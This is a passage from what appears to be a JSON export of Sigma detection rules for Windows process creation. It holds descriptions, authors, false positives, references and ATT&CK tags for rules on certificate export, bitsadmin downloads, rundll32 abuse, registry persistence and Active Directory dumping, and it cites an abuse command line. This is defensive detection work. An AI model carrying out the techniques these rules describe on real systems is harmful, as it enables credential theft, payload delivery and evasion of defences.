], "tags": [ "attack.execution", "attack.t1059.005", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", "value": "Uncommon Child Process Of BgInfo.EXE" }, { "description": "Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-18", "falsepositive": [ "Legitimate certificate exports by administrators. Additional filters might be required." 
], "filename": "proc_creation_win_powershell_export_certificate.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_export_certificate.yml" ], "tags": [ "attack.credential-access", "attack.execution", "attack.t1552.004", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e716b33-63b2-46da-86a4-bd3c3b9b5dfb", "value": "Certificate Exported Via PowerShell" }, { "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_webclient_casing.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_webclient_casing.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", "value": "Net WebClient Casing Anomalies" }, { "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Rare legitimate add to registry via cli (to these locations)" ], "filename": "proc_creation_win_reg_susp_paths.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { 
"dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "value": "Reg Add Suspicious Paths" }, { "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_attrib_system_susp_paths.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/", "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "efec536f-72e8-4656-8960-5e85d091345b", "value": "Set Suspicious Files as System Files Using Attrib.EXE" }, { "description": "Detects usage of the PowerShell New-MailboxExportRequest Cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitations", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_mailboxexport_share.yml", "level": "critical", "logsource.category": "process_creation", 
"logsource.product": "windows", "refs": [ "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://youtu.be/5mqid-7zp8k?t=2481", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_mailboxexport_share.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "889719ef-dd62-43df-86c3-768fb08dc7c0", "value": "Suspicious PowerShell Mailbox Export to Share" }, { "description": "Detects various command line and scripting engines/processes such as \"PowerShell\", \"Wscript\", \"Cmd\", etc. spawning a \"regsvr32\" instance.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-26", "falsepositive": [ "Legitimate \".bat\", \".hta\", \".ps1\" or \".vbs\" scripts leverage legitimately often. 
Apply additional filter and exclusions as necessary", "Some legitimate Windows services" ], "filename": "proc_creation_win_regsvr32_susp_parent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab37a6ec-6068-432b-a64e-2c7bf95b1d22", "value": "Scripting/CommandLine Process Spawned Regsvr32" }, { "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", "meta": { "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", "creation_date": "2022-04-28", "falsepositive": [ "Legitimate installation of a new screensaver" ], "filename": "proc_creation_win_rundll32_installscreensaver.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Libraries/Desk/", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml" ], "tags": [ "attack.t1218.011", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"15bd98ea-55f4-4d37-b09a-e7caa0fa2221", "value": "Rundll32 InstallScreenSaver Execution" }, { "description": "Detects the execution of \"ConfigSecurityPolicy.EXE\", a binary part of Windows Defender used to manage settings in Windows Defender.\nUsers can configure different pilot collections for each of the co-management workloads.\nIt can be abused by attackers in order to upload or download files.\n", "meta": { "author": "frack113", "creation_date": "2021-11-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_configsecuritypolicy_download_file.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_configsecuritypolicy_download_file.yml" ], "tags": [ "attack.exfiltration", "attack.t1567" ] }, "related": [ { "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", "value": "Arbitrary File Download Via ConfigSecurityPolicy.EXE" }, { "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml" ], "tags": 
[ "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99c840f2-2012-46fd-9141-c761987550ef", "value": "Suspicious Download From Direct IP Via Bitsadmin" }, { "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/cglyer/status/1182391019633029120", "https://twitter.com/cglyer/status/1182389676876980224", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" ], "tags": [ "attack.persistence", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "value": "WMI Backdoor Exchange Transport Agent" }, { "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", "meta": { "author": "frack113", "creation_date": "2022-06-04", "falsepositive": [ "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" ], "filename": "proc_creation_win_rundll32_user32_dll.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_user32_dll.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "value": "Suspicious Workstation Locking via Rundll32" }, { "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Some legitimate apps use this, but limited." ], "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://isc.sans.edu/diary/22264", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "value": "Suspicious Download From File-Sharing Website Via Bitsadmin" }, { "description": "Detects 
potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fortiguard.com/threat-signal-report/4718?s=09", "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.009" ] }, "related": [ { "dest-uuid": "c48a67ee-b657-45c1-91bf-6cdbe27205f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9f8f8cc-07cc-4e81-b724-f387db9175e4", "value": "Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension" }, { "description": "Detects the execution of the \"jsc.exe\" (JScript Compiler).\nAttackers might abuse this in order to compile JScript files on the fly and bypass application whitelisting.\n", "meta": { "author": "frack113", "creation_date": "2022-05-02", "falsepositive": [ "Legitimate use to compile JScript by developers." 
], "filename": "proc_creation_win_jsc_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.phpied.com/make-your-javascript-a-windows-exe/", "https://lolbas-project.github.io/lolbas/Binaries/Jsc/", "https://twitter.com/DissectMalware/status/998797808907046913", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jsc_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", "value": "JScript Compiler Execution" }, { "description": "Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.", "meta": { "author": "Endgame, JHasenbusch (ported for oscd.community)", "creation_date": "2018-10-30", "falsepositive": [ "Legitimate use of net.exe utility by legitimate user" ], "filename": "proc_creation_win_net_view_share_and_sessions_enum.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_view_share_and_sessions_enum.yml" ], "tags": [ "attack.discovery", "attack.t1018" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62510e69-616b-4078-b371-847da438cc03", "value": "Share And Session Enumeration Using Net.EXE" }, { "description": "Detects a set of suspicious network related 
commands often used in recon stages", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-07", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_nslookup_domain_discovery.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_domain_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1087", "attack.t1082", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e6313acd-208c-44fc-a0ff-db85d572e90e", "value": "Network Reconnaissance Activity" }, { "description": "Detects suspicious child processes of the Microsoft OneNote application. 
This may indicate an attempt to execute malicious embedded objects from a .one file.", "meta": { "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "creation_date": "2022-10-21", "falsepositive": [ "File located in the AppData folder with trusted signature" ], "filename": "proc_creation_win_office_onenote_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", "https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml" ], "tags": [ "attack.t1566", "attack.t1566.001", "attack.initial-access" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c27515df-97a9-4162-8a60-dc0eeb51b775", "value": "Suspicious Microsoft OneNote Child Process" }, { "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", "meta": { "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "System administrator usage", "Anti virus products", "WindowsApps located in \"C:\\Program Files\\WindowsApps\\\"" ], "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "value": "Always Install Elevated Windows Installer" }, { "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-05-27", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_regedit_trustedinstaller.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/1kwpeter/status/1397816101455765504", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_trustedinstaller.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "883835a7-df45-43e4-bf1d-4268768afda4", "value": "Regedit as Trusted Installer" }, { "description": "Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.\n", "meta": { "author": "@kostastsale", "creation_date": "2024-01-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_soaphound_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": 
[ "https://github.com/FalconForceTeam/SOAPHound", "https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_soaphound_execution.yml" ], "tags": [ "attack.discovery", "attack.t1087" ] }, "related": [ { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e92a4287-e072-4a40-9739-370c106bb750", "value": "HackTool - SOAPHound Execution" }, { "description": "Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the \"ActivateMicrosoftApp\" Excel DCOM object.\n", "meta": { "author": "Aaron Stratton", "creation_date": "2023-11-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_excel_dcom_lateral_movement.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication", "https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922", "https://github.com/grayhatkiller/SharpExShell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml" ], "tags": [ "attack.t1021.003", "attack.lateral-movement" ] }, "related": [ { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "551d9c1f-816c-445b-a7a6-7a3864720d60", "value": "Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp" }, { "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-10-23", "falsepositive": [ "Unknown" ], 
"filename": "proc_creation_win_certoc_load_dll.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "242301bc-f92f-4476-8718-78004a6efd9f", "value": "DLL Loaded via CertOC.EXE" }, { "description": "Detects an uncommon parent process of \"LINK.EXE\".\nLink.EXE is the Microsoft incremental linker. It's a utility usually bundled with the Visual Studio installation.\nMultiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcoded call to the \"LINK.EXE\" binary without checking its validity.\nThis would allow an attacker to sideload any binary with the name \"link.exe\" if one of the aforementioned tools gets executed from a different location.\nBy filtering the known locations of such utilities we can spot uncommon parent processes of LINK.EXE that might be suspicious or malicious.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_link_uncommon_parent_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1560732860935729152", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_link_uncommon_parent_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", "value": "Uncommon Link.EXE Parent Process" }, { "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-10", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rundll32_unc_path.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1021.002", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac", "value": "Rundll32 UNC Path Execution" }, { "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", "meta": { "author": "Furkan Caliskan (@caliskanfurkan_)", "creation_date": "2020-07-04", "falsepositive": [ "Legitimate admin usage" ], "filename": "proc_creation_win_pua_ditsnap.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", "value": "PUA - DIT Snapshot Viewer" }, { "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "044ba588-dff4-4918-9808-3f95e8160606", "value": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE" }, { "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-01-21", "falsepositive": [ "Legitimate deinstallation by administrative staff" ], "filename": "proc_creation_win_susp_disable_raccine.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Neo23x0/Raccine", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "value": "Raccine Uninstall" }, { "description": "Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from an uncommon parent location.", "meta": { "author": "frack113, Tim Shelton (update fp)", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Wh04m1001/SysmonEoP", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml" ], "tags": [ "attack.privilege-escalation", 